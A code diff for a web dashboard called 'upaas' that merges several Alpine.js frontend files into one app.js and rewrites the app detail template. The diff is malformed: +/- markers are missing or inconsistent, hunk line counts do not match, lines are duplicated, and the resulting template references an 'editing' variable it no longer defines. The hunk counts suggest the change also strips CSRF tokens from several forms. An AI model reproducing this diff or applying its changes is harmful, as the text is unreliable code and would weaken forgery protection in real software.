            return Alpine.store("utils").statusLabel(status);
        },
        formatTime(isoTime) {
            return Alpine.store("utils").formatRelativeTime(isoTime);
        },
    }));
 });
--- a/static/js/app.js
+++ b/static/js/app.js
@@ -0,0 +1,500 @@
 /**
 * upaas - Frontend JavaScript with Alpine.js
 */
 document.addEventListener("alpine:init", () => {
  // ============================================
  // Global Utilities Store
  // ============================================
  Alpine.store("utils", {
    /**
     * Format a date string as relative time (e.g., "5 minutes ago")
     */
    formatRelativeTime(dateStr) {
      if (!dateStr) return "";
      const date = new Date(dateStr);
      const now = new Date();
      const diffMs = now - date;
      const diffSec = Math.floor(diffMs / 1000);
      const diffMin = Math.floor(diffSec / 60);
      const diffHour = Math.floor(diffMin / 60);
      const diffDay = Math.floor(diffHour / 24);
      if (diffSec < 60) return "just now";
      if (diffMin < 60)
        return diffMin + (diffMin === 1 ? " minute ago" : " minutes ago");
      if (diffHour < 24)
        return diffHour + (diffHour === 1 ? " hour ago" : " hours ago");
      if (diffDay < 7)
        return diffDay + (diffDay === 1 ? " day ago" : " days ago");
      return date.toLocaleDateString();
    },
    /**
     * Get the badge class for a given status
     */
    statusBadgeClass(status) {
      if (status === "running" || status === "success") return "badge-success";
      if (status === "building" || status === "deploying")
        return "badge-warning";
      if (status === "failed" || status === "error") return "badge-error";
      return "badge-neutral";
    },
    /**
     * Format status for display (capitalize first letter)
     */
    statusLabel(status) {
      if (!status) return "";
      return status.charAt(0).toUpperCase() + status.slice(1);
    },
    /**
     * Check if status indicates active deployment
     */
    isDeploying(status) {
      return status === "building" || status === "deploying";
    },
    /**
     * Scroll an element to the bottom
     */
    scrollToBottom(el) {
      if (el) {
        // Use double RAF to ensure DOM has fully updated and reflowed
        requestAnimationFrame(() => {
          requestAnimationFrame(() => {
            el.scrollTop = el.scrollHeight;
          });
        });
      }
    },
    /**
     * Copy text to clipboard
     */
    async copyToClipboard(text, button) {
      try {
        await navigator.clipboard.writeText(text);
        return true;
      } catch (err) {
        // Fallback for older browsers
        const textArea = document.createElement("textarea");
        textArea.value = text;
        textArea.style.position = "fixed";
        textArea.style.left = "-9999px";
        document.body.appendChild(textArea);
        textArea.select();
        try {
          document.execCommand("copy");
          document.body.removeChild(textArea);
          return true;
        } catch (e) {
          document.body.removeChild(textArea);
          return false;
        }
      }
    },
  });
  // ============================================
  // Copy Button Component
  // ============================================
  Alpine.data("copyButton", (targetId) => ({
    copied: false,
    async copy() {
      const target = document.getElementById(targetId);
      if (!target) return;
      const text = target.textContent || target.value;
      const success = await Alpine.store("utils").copyToClipboard(text);
      if (success) {
        this.copied = true;
        setTimeout(() => {
          this.copied = false;
        }, 2000);
      }
    },
  }));
  // ============================================
  // Confirm Action Component
  // ============================================
  Alpine.data("confirmAction", (message) => ({
    confirm(event) {
      if (!window.confirm(message)) {
        event.preventDefault();
      }
    },
  }));
  // ============================================
  // Auto-dismiss Alert Component
  // ============================================
  Alpine.data("autoDismiss", (delay = 5000) => ({
    show: true,
    init() {
      setTimeout(() => {
        this.dismiss();
      }, delay);
    },
    dismiss() {
      this.show = false;
      setTimeout(() => {
        this.$el.remove();
      }, 300);
    },
  }));
  // ============================================
  // Relative Time Component
  // ============================================
  Alpine.data("relativeTime", (isoTime) => ({
    display: "",
    init() {
      this.update();
      // Update every minute
      setInterval(() => this.update(), 60000);
    },
    update() {
      this.display = Alpine.store("utils").formatRelativeTime(isoTime);
    },
  }));
  // ============================================
  // App Detail Page Component
  // ============================================
  Alpine.data("appDetail", (config) => ({
    appId: config.appId,
    currentDeploymentId: config.initialDeploymentId,
    appStatus: config.initialStatus || "unknown",
    containerLogs: "Loading container logs...",
    containerStatus: "unknown",
    buildLogs: config.initialDeploymentId
      ? "Loading build logs..."
      : "No deployments yet",
    buildStatus: config.initialBuildStatus || "unknown",
    showBuildLogs: !!config.initialDeploymentId,
    deploying: false,
    deployments: [],
    init() {
      this.deploying = Alpine.store("utils").isDeploying(this.appStatus);
      this.fetchAll();
      setInterval(() => this.fetchAll(), 1000);
    },
    fetchAll() {
      this.fetchAppStatus();
      this.fetchContainerLogs();
      this.fetchBuildLogs();
      this.fetchRecentDeployments();
    },
    async fetchAppStatus() {
      try {
        const res = await fetch(`/apps/${this.appId}/status`);
        const data = await res.json();
        this.appStatus = data.status;
        this.deploying = Alpine.store("utils").isDeploying(data.status);
        if (
          data.latestDeploymentID &&
          data.latestDeploymentID !== this.currentDeploymentId
        ) {
          this.currentDeploymentId = data.latestDeploymentID;
          this.showBuildLogs = true;
          this.fetchBuildLogs();
        }
      } catch (err) {
        console.error("Status fetch error:", err);
      }
    },
    async fetchContainerLogs() {
      try {
        const res = await fetch(`/apps/${this.appId}/container-logs`);
        const data = await res.json();
        this.containerLogs = data.logs || "No logs available";
        this.containerStatus = data.status;
        this.$nextTick(() => {
          Alpine.store("utils").scrollToBottom(this.$refs.containerLogsWrapper);
        });
      } catch (err) {
        this.containerLogs = "Failed to fetch logs";
      }
    },
    async fetchBuildLogs() {
      if (!this.currentDeploymentId) return;
      try {
        const res = await fetch(
          `/apps/${this.appId}/deployments/${this.currentDeploymentId}/logs`,
        );
        const data = await res.json();
        this.buildLogs = data.logs || "No build logs available";
        this.buildStatus = data.status;
        this.$nextTick(() => {
          Alpine.store("utils").scrollToBottom(this.$refs.buildLogsWrapper);
        });
      } catch (err) {
        this.buildLogs = "Failed to fetch logs";
      }
    },
    async fetchRecentDeployments() {
      try {
        const res = await fetch(`/apps/${this.appId}/recent-deployments`);
        const data = await res.json();
        this.deployments = data.deployments || [];
      } catch (err) {
        console.error("Deployments fetch error:", err);
      }
    },
    submitDeploy() {
      this.deploying = true;
    },
    get statusBadgeClass() {
      return Alpine.store("utils").statusBadgeClass(this.appStatus);
    },
    get statusLabel() {
      return Alpine.store("utils").statusLabel(this.appStatus);
    },
    get containerStatusBadgeClass() {
      return (
        Alpine.store("utils").statusBadgeClass(this.containerStatus) +
        " text-xs"
      );
    },
    get containerStatusLabel() {
      return Alpine.store("utils").statusLabel(this.containerStatus);
    },
    get buildStatusBadgeClass() {
      return (
        Alpine.store("utils").statusBadgeClass(this.buildStatus) + " text-xs"
      );
    },
    get buildStatusLabel() {
      return Alpine.store("utils").statusLabel(this.buildStatus);
    },
    deploymentStatusClass(status) {
      return Alpine.store("utils").statusBadgeClass(status);
    },
    deploymentStatusLabel(status) {
      return Alpine.store("utils").statusLabel(status);
    },
    formatTime(isoTime) {
      return Alpine.store("utils").formatRelativeTime(isoTime);
    },
  }));
  // ============================================
  // Deployment Card Component (for individual deployment cards)
  // ============================================
  Alpine.data("deploymentCard", (config) => ({
    appId: config.appId,
    deploymentId: config.deploymentId,
    logs: "",
    status: config.status || "",
    pollInterval: null,
    init() {
      // Read initial logs from script tag (avoids escaping issues)
      const initialLogsEl = this.$el.querySelector(".initial-logs");
      this.logs = initialLogsEl?.textContent || "Loading...";
      // Only poll if deployment is in progress
      if (Alpine.store("utils").isDeploying(this.status)) {
        this.fetchLogs();
        this.pollInterval = setInterval(() => this.fetchLogs(), 1000);
      }
    },
    destroy() {
      if (this.pollInterval) {
        clearInterval(this.pollInterval);
      }
    },
    async fetchLogs() {
      try {
        const res = await fetch(
          `/apps/${this.appId}/deployments/${this.deploymentId}/logs`,
        );
        const data = await res.json();
        const newLogs = data.logs || "No logs available";
        const logsChanged = newLogs !== this.logs;
        this.logs = newLogs;
        this.status = data.status;
        // Scroll to bottom only when content changes
        if (logsChanged) {
          this.$nextTick(() => {
            Alpine.store("utils").scrollToBottom(this.$refs.logsWrapper);
          });
        }
        // Stop polling if deployment is done
        if (!Alpine.store("utils").isDeploying(data.status)) {
          if (this.pollInterval) {
            clearInterval(this.pollInterval);
            this.pollInterval = null;
          }
          // Reload page to show final state with duration etc
          window.location.reload();
        }
      } catch (err) {
        console.error("Logs fetch error:", err);
      }
    },
    get statusBadgeClass() {
      return Alpine.store("utils").statusBadgeClass(this.status);
    },
    get statusLabel() {
      return Alpine.store("utils").statusLabel(this.status);
    },
  }));
  // ============================================
  // Deployments History Page Component
  // ============================================
  Alpine.data("deploymentsPage", (config) => ({
    appId: config.appId,
    currentDeploymentId: null,
    isDeploying: false,
    init() {
      // Check for in-progress deployments on page load
      const inProgressCard = document.querySelector(
        '[data-status="building"], [data-status="deploying"]',
      );
      if (inProgressCard) {
        this.currentDeploymentId = parseInt(
          inProgressCard.getAttribute("data-deployment-id"),
          10,
        );
        this.isDeploying = true;
      }
      this.fetchAppStatus();
      setInterval(() => this.fetchAppStatus(), 1000);
    },
    async fetchAppStatus() {
      try {
        const res = await fetch(`/apps/${this.appId}/status`);
        const data = await res.json();
        // Use deployment status, not app status - it's more reliable during transitions
        const deploying = Alpine.store("utils").isDeploying(
          data.latestDeploymentStatus,
        );
        // Detect new deployment
        if (
          data.latestDeploymentID &&
          data.latestDeploymentID !== this.currentDeploymentId
        ) {
          // Check if we have a card for this deployment
          const hasCard = document.querySelector(
            `[data-deployment-id="${data.latestDeploymentID}"]`,
          );
          if (deploying && !hasCard) {
            // New deployment started but no card exists - reload to show it
            window.location.reload();
            return;
          }
          this.currentDeploymentId = data.latestDeploymentID;
        }
        // Update deploying state based on latest deployment status
        if (deploying && !this.isDeploying) {
          this.isDeploying = true;
        } else if (!deploying && this.isDeploying) {
          // Deployment finished - reload to show final state
          this.isDeploying = false;
          window.location.reload();
        }
      } catch (err) {
        console.error("Status fetch error:", err);
      }
    },
    submitDeploy() {
      this.isDeploying = true;
    },
    formatTime(isoTime) {
      return Alpine.store("utils").formatRelativeTime(isoTime);
    },
  }));
  // ============================================
  // Dashboard Page - Relative Time Updates
  // ============================================
  Alpine.data("dashboard", () => ({
    init() {
      // Update relative times every minute
      setInterval(() => {
        this.$el.querySelectorAll("[data-time]").forEach((el) => {
          const time = el.getAttribute("data-time");
          if (time) {
            el.textContent = Alpine.store("utils").formatRelativeTime(time);
          }
        });
      }, 60000);
    },
  }));
 });
 // ============================================
 // Legacy support - expose utilities globally
 // ============================================
 window.upaas = {
  // These are kept for backwards compatibility but templates should use Alpine.js
  formatRelativeTime(dateStr) {
    if (!dateStr) return "";
    const date = new Date(dateStr);
    const now = new Date();
    const diffMs = now - date;
    const diffSec = Math.floor(diffMs / 1000);
    const diffMin = Math.floor(diffSec / 60);
    const diffHour = Math.floor(diffMin / 60);
    const diffDay = Math.floor(diffHour / 24);
    if (diffSec < 60) return "just now";
    if (diffMin < 60)
      return diffMin + (diffMin === 1 ? " minute ago" : " minutes ago");
    if (diffHour < 24)
      return diffHour + (diffHour === 1 ? " hour ago" : " hours ago");
    if (diffDay < 7)
      return diffDay + (diffDay === 1 ? " day ago" : " days ago");
    return date.toLocaleDateString();
  },
  // Placeholder functions - templates should migrate to Alpine.js
  initAppDetailPage() {},
  initDeploymentsPage() {},
 };
 // Update relative times on page load for non-Alpine elements
 document.addEventListener("DOMContentLoaded", () => {
  document.querySelectorAll(".relative-time[data-time]").forEach((el) => {
    const time = el.getAttribute("data-time");
    if (time) {
      el.textContent = window.upaas.formatRelativeTime(time);
    }
  });
 });
--- a/static/js/components.js
+++ b/static/js/components.js
@@ -1,71 +0,0 @@
 /**
 * upaas - Reusable Alpine.js Components
 *
 * Small, self-contained components: copy button, confirm dialog,
 * auto-dismiss alerts, and relative time display.
 */
 document.addEventListener("alpine:init", () => {
    // ============================================
    // Copy Button Component
    // ============================================
    Alpine.data("copyButton", (targetId) => ({
        copied: false,
        async copy() {
            const target = document.getElementById(targetId);
            if (!target) return;
            const text = target.textContent || target.value;
            const success = await Alpine.store("utils").copyToClipboard(text);
            if (success) {
                this.copied = true;
                setTimeout(() => {
                    this.copied = false;
                }, 2000);
            }
        },
    }));
    // ============================================
    // Confirm Action Component
    // ============================================
    Alpine.data("confirmAction", (message) => ({
        confirm(event) {
            if (!window.confirm(message)) {
                event.preventDefault();
            }
        },
    }));
    // ============================================
    // Auto-dismiss Alert Component
    // ============================================
    Alpine.data("autoDismiss", (delay = 5000) => ({
        show: true,
        init() {
            setTimeout(() => {
                this.dismiss();
            }, delay);
        },
        dismiss() {
            this.show = false;
            setTimeout(() => {
                this.$el.remove();
            }, 300);
        },
    }));
    // ============================================
    // Relative Time Component
    // ============================================
    Alpine.data("relativeTime", (isoTime) => ({
        display: "",
        init() {
            this.update();
            // Update every minute
            setInterval(() => this.update(), 60000);
        },
        update() {
            this.display = Alpine.store("utils").formatRelativeTime(isoTime);
        },
    }));
 });
--- a/static/js/dashboard.js
+++ b/static/js/dashboard.js
@@ -1,22 +0,0 @@
 /**
 * upaas - Dashboard Page Component
 *
 * Periodically updates relative timestamps on the main dashboard.
 */
 document.addEventListener("alpine:init", () => {
    Alpine.data("dashboard", () => ({
        init() {
            // Update relative times every minute
            setInterval(() => {
                this.$el.querySelectorAll("[data-time]").forEach((el) => {
                    const time = el.getAttribute("data-time");
                    if (time) {
                        el.textContent =
                            Alpine.store("utils").formatRelativeTime(time);
                    }
                });
            }, 60000);
        },
    }));
 });
--- a/static/js/deployment.js
+++ b/static/js/deployment.js
@@ -1,185 +0,0 @@
 /**
 * upaas - Deployment Components
 *
 * Deployment card (individual deployment log viewer) and
 * deployments history page (list of all deployments).
 */
 document.addEventListener("alpine:init", () => {
    // ============================================
    // Deployment Card Component (for individual deployment cards)
    // ============================================
    Alpine.data("deploymentCard", (config) => ({
        appId: config.appId,
        deploymentId: config.deploymentId,
        logs: "",
        status: config.status || "",
        pollInterval: null,
        _autoScroll: true,
        init() {
            // Read initial logs from script tag (avoids escaping issues)
            const initialLogsEl = this.$el.querySelector(".initial-logs");
            this.logs = initialLogsEl?.dataset.logs || "Loading...";
            // Set up scroll tracking
            this.$nextTick(() => {
                const wrapper = this.$refs.logsWrapper;
                if (wrapper) {
                    wrapper.addEventListener(
                        "scroll",
                        () => {
                            this._autoScroll =
                                Alpine.store("utils").isScrolledToBottom(
                                    wrapper,
                                );
                        },
                        { passive: true },
                    );
                }
            });
            // Only poll if deployment is in progress
            if (Alpine.store("utils").isDeploying(this.status)) {
                this.fetchLogs();
                this.pollInterval = setInterval(() => this.fetchLogs(), 1000);
            }
        },
        destroy() {
            if (this.pollInterval) {
                clearInterval(this.pollInterval);
            }
        },
        async fetchLogs() {
            try {
                const res = await fetch(
                    `/apps/${this.appId}/deployments/${this.deploymentId}/logs`,
                );
                const data = await res.json();
                const newLogs = data.logs || "No logs available";
                const logsChanged = newLogs !== this.logs;
                this.logs = newLogs;
                this.status = data.status;
                // Scroll to bottom only when content changes AND user hasn't scrolled up
                if (logsChanged && this._autoScroll) {
                    this.$nextTick(() => {
                        Alpine.store("utils").scrollToBottom(
                            this.$refs.logsWrapper,
                        );
                    });
                }
                // Stop polling if deployment is done
                if (!Alpine.store("utils").isDeploying(data.status)) {
                    if (this.pollInterval) {
                        clearInterval(this.pollInterval);
                        this.pollInterval = null;
                    }
                    // Reload page to show final state with duration etc
                    window.location.reload();
                }
            } catch (err) {
                console.error("Logs fetch error:", err);
            }
        },
        get statusBadgeClass() {
            return Alpine.store("utils").statusBadgeClass(this.status);
        },
        get statusLabel() {
            return Alpine.store("utils").statusLabel(this.status);
        },
    }));
    // ============================================
    // Deployments History Page Component
    // ============================================
    Alpine.data("deploymentsPage", (config) => ({
        appId: config.appId,
        currentDeploymentId: null,
        isDeploying: false,
        init() {
            // Check for in-progress deployments on page load
            const inProgressCard = document.querySelector(
                '[data-status="building"], [data-status="deploying"]',
            );
            if (inProgressCard) {
                this.currentDeploymentId = parseInt(
                    inProgressCard.getAttribute("data-deployment-id"),
                    10,
                );
                this.isDeploying = true;
            }
            this.fetchAppStatus();
            this._scheduleStatusPoll();
        },
        _statusPollTimer: null,
        _scheduleStatusPoll() {
            if (this._statusPollTimer) clearTimeout(this._statusPollTimer);
            const interval = this.isDeploying ? 1000 : 10000;
            this._statusPollTimer = setTimeout(() => {
                this.fetchAppStatus();
                this._scheduleStatusPoll();
            }, interval);
        },
        async fetchAppStatus() {
            try {
                const res = await fetch(`/apps/${this.appId}/status`);
                const data = await res.json();
                // Use deployment status, not app status - it's more reliable during transitions
                const deploying = Alpine.store("utils").isDeploying(
                    data.latestDeploymentStatus,
                );
                // Detect new deployment
                if (
                    data.latestDeploymentID &&
                    data.latestDeploymentID !== this.currentDeploymentId
                ) {
                    // Check if we have a card for this deployment
                    const hasCard = document.querySelector(
                        `[data-deployment-id="${data.latestDeploymentID}"]`,
                    );
                    if (deploying && !hasCard) {
                        // New deployment started but no card exists - reload to show it
                        window.location.reload();
                        return;
                    }
                    this.currentDeploymentId = data.latestDeploymentID;
                }
                // Update deploying state based on latest deployment status
                if (deploying && !this.isDeploying) {
                    this.isDeploying = true;
                    this._scheduleStatusPoll(); // Switch to fast polling
                } else if (!deploying && this.isDeploying) {
                    // Deployment finished - reload to show final state
                    this.isDeploying = false;
                    window.location.reload();
                }
            } catch (err) {
                console.error("Status fetch error:", err);
            }
        },
        submitDeploy() {
            this.isDeploying = true;
        },
        formatTime(isoTime) {
            return Alpine.store("utils").formatRelativeTime(isoTime);
        },
    }));
 });
--- a/static/js/utils.js
+++ b/static/js/utils.js
@@ -1,148 +0,0 @@
 /**
 * upaas - Global Utilities Store
 *
 * Shared formatting, status helpers, and clipboard utilities used across all pages.
 */
 document.addEventListener("alpine:init", () => {
    Alpine.store("utils", {
        /**
         * Format a date string as relative time (e.g., "5 minutes ago")
         */
        formatRelativeTime(dateStr) {
            if (!dateStr) return "";
            const date = new Date(dateStr);
            const now = new Date();
            const diffMs = now - date;
            const diffSec = Math.floor(diffMs / 1000);
            const diffMin = Math.floor(diffSec / 60);
            const diffHour = Math.floor(diffMin / 60);
            const diffDay = Math.floor(diffHour / 24);
            if (diffSec < 60) return "just now";
            if (diffMin < 60)
                return (
                    diffMin + (diffMin === 1 ? " minute ago" : " minutes ago")
                );
            if (diffHour < 24)
                return diffHour + (diffHour === 1 ? " hour ago" : " hours ago");
            if (diffDay < 7)
                return diffDay + (diffDay === 1 ? " day ago" : " days ago");
            return date.toLocaleDateString();
        },
        /**
         * Get the badge class for a given status
         */
        statusBadgeClass(status) {
            if (status === "running" || status === "success")
                return "badge-success";
            if (status === "building" || status === "deploying")
                return "badge-warning";
            if (status === "failed" || status === "error") return "badge-error";
            return "badge-neutral";
        },
        /**
         * Format status for display (capitalize first letter)
         */
        statusLabel(status) {
            if (!status) return "";
            return status.charAt(0).toUpperCase() + status.slice(1);
        },
        /**
         * Check if status indicates active deployment
         */
        isDeploying(status) {
            return status === "building" || status === "deploying";
        },
        /**
         * Scroll an element to the bottom
         */
        scrollToBottom(el) {
            if (el) {
                requestAnimationFrame(() => {
                    el.scrollTop = el.scrollHeight;
                });
            }
        },
        /**
         * Check if a scrollable element is at (or near) the bottom.
         * Tolerance of 30px accounts for rounding and partial lines.
         */
        isScrolledToBottom(el, tolerance = 30) {
            if (!el) return true;
            return (
                el.scrollHeight - el.scrollTop - el.clientHeight <= tolerance
            );
        },
        /**
         * Copy text to clipboard
         */
        async copyToClipboard(text, button) {
            try {
                await navigator.clipboard.writeText(text);
                return true;
            } catch (err) {
                // Fallback for older browsers
                const textArea = document.createElement("textarea");
                textArea.value = text;
                textArea.style.position = "fixed";
                textArea.style.left = "-9999px";
                document.body.appendChild(textArea);
                textArea.select();
                try {
                    document.execCommand("copy");
                    document.body.removeChild(textArea);
                    return true;
                } catch (e) {
                    document.body.removeChild(textArea);
                    return false;
                }
            }
        },
    });
 });
 // ============================================
 // Legacy support - expose utilities globally
 // ============================================
 window.upaas = {
    // These are kept for backwards compatibility but templates should use Alpine.js
    formatRelativeTime(dateStr) {
        if (!dateStr) return "";
        const date = new Date(dateStr);
        const now = new Date();
        const diffMs = now - date;
        const diffSec = Math.floor(diffMs / 1000);
        const diffMin = Math.floor(diffSec / 60);
        const diffHour = Math.floor(diffMin / 60);
        const diffDay = Math.floor(diffHour / 24);
        if (diffSec < 60) return "just now";
        if (diffMin < 60)
            return diffMin + (diffMin === 1 ? " minute ago" : " minutes ago");
        if (diffHour < 24)
            return diffHour + (diffHour === 1 ? " hour ago" : " hours ago");
        if (diffDay < 7)
            return diffDay + (diffDay === 1 ? " day ago" : " days ago");
        return date.toLocaleDateString();
    },
    // Placeholder functions - templates should migrate to Alpine.js
    initAppDetailPage() {},
    initDeploymentsPage() {},
 };
 // Update relative times on page load for non-Alpine elements
 document.addEventListener("DOMContentLoaded", () => {
    document.querySelectorAll(".relative-time[data-time]").forEach((el) => {
        const time = el.getAttribute("data-time");
        if (time) {
            el.textContent = window.upaas.formatRelativeTime(time);
        }
    });
 });
--- a/templates/app_detail.html
+++ b/templates/app_detail.html
@@ -35,21 +35,10 @@
        <div class="flex gap-3">
            <a href="/apps/{{.App.ID}}/edit" class="btn-secondary">Edit</a>
            <form method="POST" action="/apps/{{.App.ID}}/deploy" class="inline" @submit="submitDeploy()">
                {{ .CSRFField }}
                <button type="submit" class="btn-success" x-bind:disabled="deploying" x-bind:class="{ 'opacity-50 cursor-not-allowed': deploying }">
                    <span x-text="deploying ? 'Deploying...' : 'Deploy Now'"></span>
                </button>
            </form>
            <form method="POST" action="/apps/{{.App.ID}}/deployments/cancel" class="inline" x-show="deploying" x-cloak x-data="confirmAction('Cancel the current deployment?')" @submit="confirm($event)">
                {{ .CSRFField }}
                <button type="submit" class="btn-danger">Cancel Deploy</button>
            </form>
            {{if .App.PreviousImageID.Valid}}
            <form method="POST" action="/apps/{{.App.ID}}/rollback" class="inline" x-data="confirmAction('Roll back to the previous deployment?')" @submit="confirm($event)">
                {{ .CSRFField }}
                <button type="submit" class="btn-warning">Rollback</button>
            </form>
            {{end}}
        </div>
    </div>
@@ -77,10 +66,7 @@
    <!-- Webhook URL -->
    <div class="card p-6 mb-6">
-        <div class="flex items-center justify-between mb-4">
+        <h2 class="section-title mb-4">Webhook URL</h2>
            <h2 class="section-title">Webhook URL</h2>
            <a href="/apps/{{.App.ID}}/webhooks" class="text-primary-600 hover:text-primary-800 text-sm">Event History</a>
        </div>
        <p class="text-sm text-gray-500 mb-3">Add this URL as a push webhook in your Gitea repository:</p>
        <div class="copy-field" x-data="copyButton('webhook-url')">
            <code id="webhook-url" class="copy-field-value text-xs">{{.WebhookURL}}</code>
@@ -115,34 +101,14 @@
                </thead>
                <tbody class="table-body">
                    {{range .EnvVars}}
-                    <tr x-data="{ editing: false }">
+                    <tr>
                        <template x-if="!editing">
                        <td class="font-mono font-medium">{{.Key}}</td>
                        </template>
                        <template x-if="!editing">
                        <td class="font-mono text-gray-500">{{.Value}}</td>
                        </template>
                        <template x-if="!editing">
                        <td class="text-right">
-                                <button @click="editing = true" class="text-primary-600 hover:text-primary-800 text-sm mr-2">Edit</button>
+                            <form method="POST" action="/apps/{{$.App.ID}}/env/{{.ID}}/delete" class="inline" x-data="confirmAction('Delete this environment variable?')" @submit="confirm($event)">
                                <form method="POST" action="/apps/{{$.App.ID}}/env-vars/{{.ID}}/delete" class="inline" x-data="confirmAction('Delete this environment variable?')" @submit="confirm($event)">
                                    {{ $.CSRFField }}
                                <button type="submit" class="text-error-500 hover:text-error-700 text-sm">Delete</button>
                            </form>
                        </td>
                        </template>
                        <template x-if="editing">
                            <td colspan="3">
                                <form method="POST" action="/apps/{{$.App.ID}}/env-vars/{{.ID}}/edit" class="flex gap-2 items-center">
                                    {{ $.CSRFField }}
                                    <input type="text" name="key" value="{{.Key}}" required class="input flex-1 font-mono text-sm">
                                    <input type="text" name="value" value="{{.Value}}" required class="input flex-1 font-mono text-sm">
                                    <button type="submit" class="btn-primary text-sm">Save</button>
                                    <button type="button" @click="editing = false" class="text-gray-500 hover:text-gray-700 text-sm">Cancel</button>
                                </form>
                                <p class="text-xs text-amber-600 mt-1">⚠ Container restart needed after env var changes.</p>
                            </td>
                        </template>
                    </tr>
                    {{end}}
                </tbody>
@@ -150,7 +116,6 @@
        </div>
        {{end}}
        <form method="POST" action="/apps/{{.App.ID}}/env" class="flex flex-col sm:flex-row gap-2">
                {{ .CSRFField }}
            <input type="text" name="key" placeholder="KEY" required class="input flex-1 font-mono text-sm">
            <input type="text" name="value" placeholder="value" required class="input flex-1 font-mono text-sm">
            <button type="submit" class="btn-primary">Add</button>
@@ -179,40 +144,20 @@
                        </td>
                    </tr>
                    {{range .Labels}}
-                    <tr x-data="{ editing: false }">
+                    <tr>
                        <template x-if="!editing">
                        <td class="font-mono font-medium">{{.Key}}</td>
                        </template>
                        <template x-if="!editing">
                        <td class="font-mono text-gray-500">{{.Value}}</td>
                        </template>
                        <template x-if="!editing">
                        <td class="text-right">
                                <button @click="editing = true" class="text-primary-600 hover:text-primary-800 text-sm mr-2">Edit</button>
                            <form method="POST" action="/apps/{{$.App.ID}}/labels/{{.ID}}/delete" class="inline" x-data="confirmAction('Delete this label?')" @submit="confirm($event)">
                                    {{ $.CSRFField }}
                                <button type="submit" class="text-error-500 hover:text-error-700 text-sm">Delete</button>
                            </form>
                        </td>
                        </template>
                        <template x-if="editing">
                            <td colspan="3">
                                <form method="POST" action="/apps/{{$.App.ID}}/labels/{{.ID}}/edit" class="flex gap-2 items-center">
                                    {{ $.CSRFField }}
                                    <input type="text" name="key" value="{{.Key}}" required class="input flex-1 font-mono text-sm">
                                    <input type="text" name="value" value="{{.Value}}" required class="input flex-1 font-mono text-sm">
                                    <button type="submit" class="btn-primary text-sm">Save</button>
                                    <button type="button" @click="editing = false" class="text-gray-500 hover:text-gray-700 text-sm">Cancel</button>
                                </form>
                            </td>
                        </template>
                    </tr>
                    {{end}}
                </tbody>
            </table>
        </div>
        <form method="POST" action="/apps/{{.App.ID}}/labels" class="flex flex-col sm:flex-row gap-2">
                {{ .CSRFField }}
            <input type="text" name="key" placeholder="label.key" required class="input flex-1 font-mono text-sm">
            <input type="text" name="value" placeholder="value" required class="input flex-1 font-mono text-sm">
            <button type="submit" class="btn-primary">Add</button>
@@ -235,14 +180,9 @@
                </thead>
                <tbody class="table-body">
                    {{range .Volumes}}
-                    <tr x-data="{ editing: false }">
+                    <tr>
                        <template x-if="!editing">
                        <td class="font-mono">{{.HostPath}}</td>
                        </template>
                        <template x-if="!editing">
                        <td class="font-mono">{{.ContainerPath}}</td>
                        </template>
                        <template x-if="!editing">
                        <td>
                            {{if .ReadOnly}}
                            <span class="badge-neutral">Read-only</span>
@@ -250,31 +190,11 @@
                            <span class="badge-info">Read-write</span>
                            {{end}}
                        </td>
                        </template>
                        <template x-if="!editing">
                        <td class="text-right">
                                <button @click="editing = true" class="text-primary-600 hover:text-primary-800 text-sm mr-2">Edit</button>
                            <form method="POST" action="/apps/{{$.App.ID}}/volumes/{{.ID}}/delete" class="inline" x-data="confirmAction('Delete this volume mount?')" @submit="confirm($event)">
                                    {{ $.CSRFField }}
                                <button type="submit" class="text-error-500 hover:text-error-700 text-sm">Delete</button>
                            </form>
                        </td>
                        </template>
                        <template x-if="editing">
                            <td colspan="4">
                                <form method="POST" action="/apps/{{$.App.ID}}/volumes/{{.ID}}/edit" class="flex gap-2 items-center">
                                    {{ $.CSRFField }}
                                    <input type="text" name="host_path" value="{{.HostPath}}" required class="input flex-1 font-mono text-sm" placeholder="/host/path">
                                    <input type="text" name="container_path" value="{{.ContainerPath}}" required class="input flex-1 font-mono text-sm" placeholder="/container/path">
                                    <label class="flex items-center gap-1 text-sm text-gray-600 whitespace-nowrap">
                                        <input type="checkbox" name="readonly" value="1" {{if .ReadOnly}}checked{{end}} class="rounded border-gray-300 text-primary-600 focus:ring-primary-500">
                                        RO
                                    </label>
                                    <button type="submit" class="btn-primary text-sm">Save</button>
                                    <button type="button" @click="editing = false" class="text-gray-500 hover:text-gray-700 text-sm">Cancel</button>
                                </form>
                            </td>
                        </template>
                    </tr>
                    {{end}}
                </tbody>
@@ -282,7 +202,6 @@
        </div>
        {{end}}
        <form method="POST" action="/apps/{{.App.ID}}/volumes" class="flex flex-col sm:flex-row gap-2 items-end">
                {{ .CSRFField }}
            <div class="flex-1 w-full">
                <input type="text" name="host_path" placeholder="/host/path" required class="input font-mono text-sm">
            </div>
@@ -325,7 +244,6 @@
                        </td>
                        <td class="text-right">
                            <form method="POST" action="/apps/{{$.App.ID}}/ports/{{.ID}}/delete" class="inline" x-data="confirmAction('Delete this port mapping?')" @submit="confirm($event)">
                {{ .CSRFField }}
                                <button type="submit" class="text-error-500 hover:text-error-700 text-sm">Delete</button>
                            </form>
                        </td>
@@ -336,7 +254,6 @@
        </div>
        {{end}}
        <form method="POST" action="/apps/{{.App.ID}}/ports" class="flex flex-col sm:flex-row gap-2 items-end">
                {{ .CSRFField }}
            <div class="flex-1 w-full">
                <label class="block text-xs text-gray-500 mb-1">Host (external)</label>
                <input type="text" name="host_port" placeholder="8080" required pattern="[0-9]+" class="input font-mono text-sm">
@@ -362,17 +279,8 @@
            <h2 class="section-title">Container Logs</h2>
            <span x-bind:class="containerStatusBadgeClass" x-text="containerStatusLabel"></span>
        </div>
-        <div class="relative">
+        <div x-ref="containerLogsWrapper" class="bg-gray-900 rounded-lg p-4 overflow-auto" style="max-height: 400px;">
-            <div x-ref="containerLogsWrapper" class="bg-gray-900 rounded-lg p-4 overflow-y-auto" style="max-height: 400px;">
+            <pre class="text-gray-100 text-xs font-mono whitespace-pre-wrap" x-text="containerLogs"></pre>
                <pre class="text-gray-100 text-xs font-mono whitespace-pre-wrap break-words m-0" x-text="containerLogs"></pre>
            </div>
            <button
                x-show="!_containerAutoScroll"
                x-transition
                @click="_containerAutoScroll = true; Alpine.store('utils').scrollToBottom($refs.containerLogsWrapper)"
                class="absolute bottom-2 right-4 bg-primary-600 hover:bg-primary-700 text-white text-xs px-3 py-1 rounded-full shadow-lg opacity-90 hover:opacity-100 transition"
                title="Scroll to bottom"
            >↓ Follow</button>
        </div>
    </div>
@@ -421,17 +329,8 @@
